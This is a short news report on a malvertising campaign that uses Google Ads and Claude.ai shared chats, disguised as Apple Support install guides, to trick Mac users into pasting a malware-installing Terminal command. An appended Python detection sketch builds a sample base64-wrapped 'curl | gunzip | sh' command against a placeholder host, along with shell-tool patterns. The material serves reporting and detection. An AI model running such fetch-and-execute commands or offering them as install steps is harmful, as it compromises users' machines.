Cyber: Breaking: Hackers Abuse Google Ads, Claude.ai Chats To Push Mac Malware
Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign. Users searching for "Claude mac download" may come across sponsored search results that list claude.ai as the target website, but lead to instructions that install malware on their Mac.

The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. Albayrak identified a Claude.ai shared chat that presents itself as an official "Claude Code on Mac" installation guide, attributed to "Apple Support." The chat walks users through opening Terminal and pasting a command, which silently downloads and runs malware on their Mac.

While attempting to verify Albayrak's findings, BleepingComputer landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure. The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing:

The base64 instructions shown in the shared Claude chat download an encoded shell script from domains such as:

The 'loader.sh' (served by the second link above) is another set of Gunzip-compressed shell instructions:

This compressed shell script runs entirely in memory, leaving little obvious trace on disk.
Source: BleepingComputer
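A detection sketch for the chain described above (base64-wrapped instructions that fetch a script, decompress it with gunzip, and hand it straight to a shell). This is an added example, not code from the BleepingComputer report or from Albayrak's findings; the function names, the sample command lines and the example.invalid domain are constructed for illustration, and splitting on "|" is a simplification that ignores shell quoting.

```python
import base64
import binascii
import re

# Heuristic classifiers for one pipeline segment (not a full shell parser).
STAGES = {
    "fetch": re.compile(r"\b(curl|wget)\b"),
    "b64decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "gunzip": re.compile(r"\b(gunzip|zcat|gzip\s+-[a-z]*d[a-z]*)\b"),
    "shell": re.compile(r"^\s*(/bin/|/usr/bin/)?(ba|z)?sh\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def classify(segment):
    """Return the stage labels matching one '|'-separated segment."""
    return {name for name, rx in STAGES.items() if rx.search(segment)}

def inspect(cmdline, depth=0):
    """Return sorted findings of the form 'stage->shell' for a command line."""
    segments = [classify(s) for s in cmdline.split("|")]
    findings = set()
    for i, labels in enumerate(segments):
        if i > 0 and "shell" in labels:
            # Whatever sits upstream of the interpreter is what it executes.
            upstream = set().union(*segments[:i]) - {"shell"}
            findings |= {f"{u}->shell" for u in upstream}
    if depth < 2:  # peel at most two layers of inline base64
        for token in B64_TOKEN.findall(cmdline):
            try:
                inner = base64.b64decode(token, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue
            findings |= {f"inner:{f}" for f in inspect(inner, depth + 1)}
    return sorted(findings)

# Constructed sample command lines; example.invalid is a placeholder domain.
_SECOND_STAGE = "curl -fsSL https://example.invalid/loader.sh | gunzip | sh"
SAMPLES = [
    f"echo {base64.b64encode(_SECOND_STAGE.encode()).decode()} | base64 -D | zsh",
    "curl -fsSL https://example.invalid/install.sh -o install.sh",
    "base64 -d notes.b64 > notes.txt",
]

def triage(cmdlines):
    """Map each suspicious command line to its findings; benign ones drop out."""
    return {c: f for c in cmdlines if (f := inspect(c))}

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLES).items():
        print(hits, "<-", cmd[:60])
```

Run over process-execution telemetry, a check like this catches the pasted command even though the later stages never touch disk, because the decode-to-interpreter chain is visible in the command line itself.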